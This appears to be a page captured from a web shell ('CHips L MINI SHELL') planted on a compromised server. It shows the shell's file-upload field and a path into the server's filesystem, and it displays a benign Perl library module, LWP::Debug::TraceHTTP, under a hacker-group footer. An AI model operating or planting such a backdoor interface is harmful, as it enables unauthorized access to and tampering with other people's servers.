CHips L MINI SHELL

CHips L pro

Current Path : /proc/2/cwd/usr/share/perl5/LWP/Debug/
Upload File :
Current File : //proc/2/cwd/usr/share/perl5/LWP/Debug/TraceHTTP.pm

package LWP::Debug::TraceHTTP;
$LWP::Debug::TraceHTTP::VERSION = '6.26';
# Just call:
#
#   require LWP::Debug::TraceHTTP;
#   LWP::Protocol::implementor('http', 'LWP::Debug::TraceHTTP');
#
# to use this module to trace all calls to the HTTP socket object in
# programs that use LWP.

use strict;
use base 'LWP::Protocol::http';

package LWP::Debug::TraceHTTP::Socket;
$LWP::Debug::TraceHTTP::Socket::VERSION = '6.26';
use Data::Dump 1.13;
use Data::Dump::Trace qw(autowrap mcall);

autowrap("LWP::Protocol::http::Socket" => "sock");

sub new {
    my $class = shift;
    return mcall("LWP::Protocol::http::Socket" => "new", undef, @_);
}

1;

Copyright 2K16 - 2K18 Indonesian Hacker Rulez